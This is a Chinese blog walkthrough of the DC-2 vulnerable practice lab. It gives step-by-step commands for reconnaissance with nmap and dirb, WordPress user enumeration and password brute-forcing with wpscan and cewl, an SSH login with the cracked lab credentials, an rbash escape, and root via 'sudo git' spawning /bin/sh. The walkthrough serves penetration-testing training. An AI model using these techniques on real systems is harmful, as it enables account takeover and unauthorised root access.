DC-2通关教程

已于 2024-09-27 10:10:54 修改
阅读量1k 收藏 28
点赞数 17
文章标签: c++
于 2024-09-26 19:59:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83876878/article/details/142575002
版权

DC-2 通关详解

一.环境搭建:

与DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。与最初的DC-1一样,它是为初学者设计的。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。就像DC-1一样,有五面旗帜,包括最后一面旗帜。和DC-1一样,旗子对初学者来说很重要,但对有经验的人来说就不那么重要了。简而言之,唯一真正有意义的旗帜,是最后一面旗帜。对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等。我没有探索实现root的所有方法,因为我放弃了我一直在研究的上一个版本,并从基本操作系统安装中完全重新开始。

和DC-1一样,有五个flag

二、渗透靶场

1、目标:

    目标就是我们搭建的靶场,靶场IP为:XXX.XXX.XXX.XXX/24

2、信息收集:寻找靶机真实IP

nmap -sP 192.168.52.1/24

3、信息收集:探端口及服务

nmap -A -p- -v 192.168.52.130

发现开放了80端口,存在web服务,Apache/2.4.10,

    发现开放了7744端口,开放了ssh服务,OpenSSH 6.7p1

4、访问web站点

http:// 192.168.52.130

5. 发现不能访问,且发现我们输入的ip地址自动转化为了域名,我们想到dc-2这个域名解析失败,我们需要更改hosts文件,添加一个ip域名指向。

修改hosts文件,添加靶机IP到域名dc-2的指向然后输入代码vim /etc/hosts

6.然后再访问显示访问成功

然后输入dirb http://dc-2/进行文件扫描

发现dc-2的后台地址

然后打开登录页面

会发现有很多http的代码这些没有什么大用处

7..通常是指一种网络安全测试技术,用于探测目标系统是否允许用户通过尝试常见的用户名来猜测账户是否存在。攻击者会列举一系列常见的用户名,如“admin”,“test”,“guest”等,并尝试登录服务器,如果遇到响应,就表明该用户名可能是有效的。这种技术常用于弱密码策略或未启用复杂身份验证系统的环境中。

这种行为是非法的并且可能构成拒绝服务攻击(DoS),因此在安全设计中,系统应采用安全的密码策略并限制用户名猜测尝试,比如设置验证码、IP封锁等机制,以防止此类枚举攻击。

wpscan --url http://dc-2

wpscan --url http://dc-2 --enumerate t 扫描主题

wpscan --url http://dc-2 --enumerate p 扫描插件

wpscan --url http://dc-2 --enumerate u 枚举用户

    扫描wordpress版本

wpscan --url http://dc-2

8.发现4.7.10的版本

登录页面尝试登录
随即输入用户名密码可以随便输入,提示用户名不存在,似乎可以进行用户名枚举

然后用下面代码进行枚举到的用户爆破密码

wpscan --url http://dc-2 --enumerate u

9.破解出三个用户名

admin jerry tom

暴力破解出账号密码

用下面代码进行对flag1进行破解cewl可以生成字典查看

cewl http://dc-2/ -w dict.txt   或者 cewl http://dc-2/ > 1.txt

输入代码使用wpscan进行暴力破解

wpscan --url http://dc-2 --passwords dc2.txt

爆破出来两个账号 

jerry/adipiscing

tom/parturient

jerry/adipiscing登录此站点

10.首先来个用户枚举,再尝试利用枚举到的用户爆破密码

wpscan --url http://dc-2 --enumerate u

 爆破出来两个账号 

jerry/adipiscing tom/parturient

使用jerry/adipiscing登录此站点

tom/parturient登陆此站点

11.发现flag2

登录后台之后,我们看到flag2,我用的是jerry的账号

点进去之后看到flag2提示信息,简单说就是如果wordpress行不通的话就会一个点,我们之前发现有ssh,我们看看ssh

If you can't exploit WordPress and take a shortcut, there is another way.

如果你不能利用WordPress并采取一条捷径,还有另外一种方法。

Hope you found another entry point.

希望你找到了另一个入口。

10、在tom的目录下发现flag3

jerry/adipiscing

tom/parturient

登录ssh

sshtom@192.168.52.130 -p 7744

在tom账号的目录 发现flag3cat不能用

把所有命令用less和vi都可以查看

11.接下来,尝试rbash绕过详情参考 https://xz.aliyun.com/t/7642

查看可以使用的命令

echo $PATH

cd进不去目录 使用ls直接查看目录信息

12.使用echo来绕过rbash

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

echo /*

看到提示信息如下

Good to see that you've made it this far - but you " re not home yet .

很高兴看到你走了这么远,但你还没回家。

You still need to get the final flag (the only flag that really counts!!! ).

您仍然需要获得最后的标志(唯一真正重要的标志!)

No hints here 一you're on your own now. :- )

这里没有暗示,一,你现在只能靠自己了。*-)

Go on

继续

git outta here!!!!

大致意思就是还没有结束。猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权

    使用tom用户无权限运行sudo 我们切换到jerry用户

    我们可以看到无需root权限,jerry 可以使用 git

sudo -l  

13.提权

查看一下可以使用的root权限命令

find / -user root -perm -4000 -print 2>/dev/null

jerry用户也不可以直接sudo su

使用git命令进行提取sudo git help status

输入!/bin/sh,直接输入就行

然后再输入sudo git help status进行提权

14.发现final-flag.txt

cd /root

cat final-flag.txt

到这一步也就代表着结束了

財多亿
关注
Dc-2通关教程
2402_84645634的博客
09-29 821
DC-2从环境搭建到通关教程
DC-4通关教程
m0_74402888的博客
04-24 2099
6默认的shell:这个字段指定了用户的默认shell,即用户登录后用来执行命令的程序。在Linux系统中,/etc/passwd是一个重要的系统用户配置文件,用于存储系统中所有用户的基本信息。在Linux中,/usr/bin目录主要用于存放用户可执行的二进制文件,即用户可以直接执行的程序。火狐浏览器打开网页,用自带的扩展“wappalyzer”查看页面的一些信息,cms,js版本,和php信息,发现没有可用的信息,5家目录:这个字段指定了用户的家目录,即用户登录后所处的目录。用户可以属于多个组。
DC-5通关教程
m0_74402888的博客
04-25 1064
具体来说,这个命令在文件系统的根目录(/)开始,查找所有设置了setuid位(set user ID on execution)的文件,并将这些文件的路径打印出来。可以看到有两个特殊的命令,exim之前在DC-4的时候试过了,不能完全得到root权限,这里用screen作为突破口,用searchsploit工具搜索一下漏洞。编译完后,再将这两个c文件删掉,文本让我们用rm命令,我们也可以自己删,接着我们修改exp.sh文件内容。刷新后页面内容会发生变化,可能存在文件包涵,这个是一个突破口。
靶机-DC-2通关全过程
认真走好每一小步
06-18 508
其中,"^USER^"和"^PASS^"将在攻击过程中分别被替换为不同的用户名和密码,"wp-submit=LogIn"表示登录按钮的名称,"testcookie=1"表示要求服务器设置一个测试Cookie,而"S=location"表示如果攻击成功,就重定向到/target/路径下的网页。当一个用户使用rbash作为其默认shell时,该用户将被限制只能执行一些基本的命令,例如cd、ls和echo等,并且不能使用绝大多数的shell功能,如变量赋值、重定向、管道和通配符扩展等。
DC-8通关教程
m0_74402888的博客
04-26 1159
SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限,若是对一些特殊命令设置了SUID,那么将会有被提权的风险。nid=1" --level=5 --risk=3 --batch --current-db //爆破当前数据库。测试发现是john的密码,在/user/login处登入,探索发现在WEBFORM处可以编辑并执行PHP代码。sudo是给某个用户或者组授予执行某些命令的权限,权限在人身上。SUID是给命令赋予root用户的权限,权限在命令上。
DC-2靶机通关
m0_57206390的博客
08-19 145
DC-2靶机通关,详解
DC-3通关教程
m0_74402888的博客
04-23 840
利用John(john 设置为使用特定的哈希格式进行破解,有多种方法可以做到对哈希类型进行识别)工具,对该密码进行爆破拆解。接着我们下载该压缩包并放到kali桌面里,解压该文件,然后在桌面开启http服务,将下载好的文件导入到DC-3靶机里。漏洞查找工具,可以通过操作系统或cms的版本号搜索到相应漏洞,通过查看说明即可找到漏洞利用方法。joomscan是一款开源的且针对joomla的扫描器,kali可以用命令。searchsploit是一款kali自带的搜索漏洞信息的模块。
DC-6通关教程
m0_74402888的博客
04-25 942
原理:nmap 可以执行脚本文件,可以创建一个文件并写入反弹 shell 的命令,默认用root 权限执行,所以反弹的 shell 也是 root。发现了jens用户的无密码命令执行文件backup.sh,也就是以jens的身份横向命令执行,接着我们来看一下该文件。根据在DC-6官网的提示,使用kali自带的巨大字典rockyou.txt中含有k01的密码作为爆破的字典。sudo -l 命令用于列出当前用户可通过 sudo(SuperUser DO)命令执行的所有命令的权限。
DC-1通关教程
2401_83876878的博客
09-20 831
我们切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件。发现开放了80端口,存在web服务,Apache httpd 2.2.22,Drupal 7。扫描网段中有哪些主机在线,使用 -sP 参数,不扫描端口,只扫描「存活主机」。进入home目录,发现flag4.txt文件,提示需要提升权限。
2024年网安最新DC系列靶机1通关教程_dc1 靶机
2401_84298087的博客
05-01 294
Meterpreter是Metasploit框架中一种强大的后渗透工具,用于在目标系统上执行各种进程控制、信息收集、权限提升和持久化技术等操作。它是一个基于交互式命令行的模块化载荷,可与受感染的目标系统进行远程通信。进程控制:可查看、创建、终止和注入进程。文件系统:可以浏览、上传、下载、编辑和删除文件。系统信息:可获取目标主机的详细信息,如操作系统类型、内核版本等。网络管理:可以查看网络接口、扫描主机、进行端口转发等操作。权限提升:可尝试获取更高的权限,如提升到管理员或SYSTEM权限。
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3070
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
WEB-CTF通关教程
m0_50098640的博客
08-01 601
信息泄露的第二关 进去页面如下 查看源代码发现后缀为.sql的文件。 看见这个文件思路就是把这个文件下载下来查看敏感数据。尝试在链接后直接加文件名,发现直接下载了我们的文件。 使用记事本打开文件,得到flag值。 暴力破解第二关 打开页面提示如下, 点击地址传送门得到如下链接 将链接的UID使用在线base64解码得到的结果如下 看到这明白了解这个题的思路,抓包爆破UID值。从T_1到T_5000,思路有了,可是具体爆破的时候不知道怎么爆破,等知道怎么解决这个问题了之后再来更。 xss第二关
【xss-labs靶场实战通关教程
AuroraMiraitowa的博客
03-09 1175
好吧,原来还有其他隐藏的传参方法,学到了,下次就一个个测,这里是get传参t_sort,并过滤掉了<>号,不能闭合插入标签,但是我们还能用onfocus事件,因为这里输入框被隐藏了,需要添加type=“text”,构造payload。不难发现,这里面进行了小写转化,将检测出来的on,script,href给删掉了,但是没有关系,我们可以利用双拼写来绕过,这里可以看到,Get传参的值,只插入了h2标签里头,额那下面的input标签啥东西,还隐藏掉了。
【智能交互】OPPO接入小布语音技能通关教程:个人开发者实现接口调用
C站全栈优质创作者、阿里云受邀博主专家,喜欢结识新伙伴寻找志同道合的朋友,欢迎一起探讨学习
07-19 3196
适用人群:本教程适合大赛接入小布语音技能的同学以及初次使用小布助手的开发者本篇文章是博主弄了多次测试才勉强弄明白的,OPPO的开发文档和没有没啥区别很多人会问:“为啥有更成熟的其他语音技能平台放着不用?答:“因为我在参加的比赛是由oppo主办方举办的,若要想进决赛,必须要接入OPPO开放平台”猜想测试部分和实际操作部分,请根据你的需要进行跳过选择。
C语言中的宏
jkzyx123的博客
10-30 342
宏:使用#define指令定义,不需要分配存储空间,简单的文本替换。常量:使用const关键字或enum定义,有类型,并且在编译时分配内存。
C++显式类型转换:解析多种转换方式的奥秘》
xy520521的博客
10-27 699
当我们从一个存储 Shape 指针的容器中取出指针并希望将其转换为具体的派生类指针以调用特定的绘制方法时,动态_cast可以确保转换的安全性,避免在对象类型不匹配时出现错误。需要注意的是,使用 const_cast修改一个原本被定义为 const 的对象可能会导致未定义的行为,因为这违反了 const 的语义。例如,当我们有一个 const 引用指向一个对象,但在某个特定的函数内部,我们知道这个函数不会修改对象的值,但需要将其传递给一个非 const 版本的函数时,可以使用 const_cast。
C++朝花夕拾
最新发布
weixin_44155149的博客
10-30 922
1.从文件中按行读取数据,getline有很多版本,fstream的getline,std命名空间下的getline研究用法太麻烦,以后暂时统一使用std命名空间下的getline(文件流 ,std::string )SheepTuo(羊驼)从Sheep(羊)类继承了一个vbptr(虚基类指针),从 Tuo(驼)类也继承了一个vbptr(虚基类指针),这两个指针分别指向一张虚基类表,表中有一个偏移量。本质:引用的本质在C++内部实现是一个指针常量(不可以修改指针的指向,但可以修改指向的值)
linux c-exec系列函数学习
程序猿的成长笔记
10-25 299
这些函数都是以替换的方式,创建一个新的进程替代当前的进程。新的进程与原来的进程号相同,所有的用户空间(代码段、数据段)及部分的内核空间都可以视为是全新的。要注意与fork函数的区别。:可以参考va_start系列的(宏)函数,因此,无论是...,还是vector,还是环境变量的数组,最后一个元素必须是。,相关的错误代码会被设置到errno中。在执行错误的有返回值,且返回值为。
c c++语法的兼容性写法
lanxiaziyi的专栏
10-25 202
c/c++杂记
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值